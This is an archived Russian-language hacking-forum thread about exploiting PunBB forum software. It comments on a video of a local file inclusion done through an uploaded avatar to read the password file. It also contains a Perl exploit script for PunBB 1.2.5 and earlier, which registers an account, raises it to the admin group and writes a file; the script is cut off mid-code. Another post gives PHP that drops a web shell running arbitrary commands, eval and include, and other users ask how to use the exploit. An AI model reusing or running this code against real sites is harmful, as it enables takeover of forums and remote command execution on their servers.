Дырки PunBB

Discussion in 'Video.Antichat' started by KEZ, 14 Jul 2005.

  1. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    комментарии
    -----------------
    от меня:
    видео хорошее, довольно качественное,
    только
    1) нету комментов в архиве
    2) зачем выводить содержимое passwd ? можно было сделать чтото поинтереснее ...
     
  2. Zadoxlik

    Zadoxlik рояль с сыром

    Joined:
    28 Feb 2005
    Messages:
    758
    Likes Received:
    216
    Reputations:
    257
    мда. Я не знаком с панББ, но если пан_инклуд вставляет в код любой файл, то зачем там были все эти выкрутасы с аваторой ? Не проще было загрузить сразу через фтп или хттп. И тем более если единственной целью был просмотр етс/пассвд, это можно было сделать прямо через этот же файл =\. Странное долгое, неинформативное видео.
    Пусть автор не обижается, но помойму оно совершенно бесполезно - для скрипткидди, ломающих форум по сплоитам куда проще взять сплоит из обзора этой уязвимости в текстовом формате, а новичку, познающимк веб-хацкерское дело тут не показано абсолютно ничего что обычно можно сделать в таких случаях. Да плюс ко всему комметнариев совсем нет. Лично для меня так и осталось загадкой что такое пан_инклуд. Автор видео что-то куда-то тыкает, бегает мышкой. Не помешало бы по-чаще заглядывать в окно с комментариями для пояснения происходящего !
     
  3. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    пан_инклуд может инклудить только локальные файлы, поэтому и надо грузить аватару
    а passwd я показал просто как пример- ведь уже понятно что можно создать было любой php скрипт
    а насчет чего-нить поинтереснее заинклудить- то не хотелось палить это кое-что интересное
     
    #3 ShAnKaR, 14 Jul 2005
    Last edited: 14 Jul 2005
  4. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    мой сплоит для punbb <=1.2.5

    #!/usr/bin/perl -w

    use HTTP::Request::Common;
    use HTTP::Cookies;
    use LWP;
    use URI::Escape;
    #powered by ShAnKaR
    print "please enter url :";
    $url=<STDIN>;
    chomp($url);
    $user='ShAnKaR';
    $mail='[email protected]';
    $file='sh.jpg';
    my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)',timeout=>10);
    $ua->cookie_jar( HTTP::Cookies->new());
    $proxy='127.0.0.1:3128';#proxy nax
    $ua->proxy('http', "http://$proxy/" );
    my $req = new HTTP::Request 'POST',$url."register.php?agree=yes";
    $data='form_sent=1&req_username='.$user.'&req_password1=password&req_password2=password&timezone=1&req_email1='.$mail.'&email_setting=2&save_pass=1&register=Register';
    $req->content_type('application/x-www-form-urlencoded');
    $req->content($data);
    my $res = $ua->request($req);
    $res=$ua->get($url."profile.php");
    $content=$res->content;
    $content=~ s!profile.php\?id=(\d+)!$1!g;
    if($1){
    print "Registration complete\n";
    my $id=$1;
    print "user id=".$id."\n";
    $req = new HTTP::Request 'POST',$url.'profile.php?section=personal&id='.$id.'&temp[0]=group_id=1';
    $data='form_sent=1&form=0&update=Submit'; $req->content_t...,'w+'); fwrite($fd,$text); fclose($fd); ?>
     
    #4 ShAnKaR, 15 Jul 2005
    Last edited: 30 Jul 2005
  5. dampil

    dampil New Member

    Joined:
    5 May 2005
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    а как етим сплоитом пользоватся ?
     
  6. gradusn1k

    gradusn1k New Member

    Joined:
    9 Aug 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    подскажите кто-нить как енту аватарку с пхп-кодом внутри создать? :confused:
     
    #6 gradusn1k, 9 Aug 2005
    Last edited: 9 Aug 2005
  7. Netch

    Netch New Member

    Joined:
    9 Aug 2005
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    <?php
    $text='<?php
    if(isset($cmd))system($cmd);
    if(isset($eval))eval($eval);
    if(isset($inc))include($inc);
    ?>'
    $fd=fopen('img/avatars/q.php','w+');
    fwrite($fd,$text);
    fclose($fd);
    ?>

    Вот у меня именно в этом куске перл ругаеться на то что <> не прально поставлены. цитата из perl:
    syntax error at C:\EXP.pl line 66, near "$forum_ id"
    syntax error at C:\EXP.pl line 76, near "$forum_ id"
    Unterminated <> operator at C:\EXP.pl line 105.
    На счет "$forum_ id" - там по ходу пробел лишний. А вот с 105 строкой ни как не могу ничего поделать =(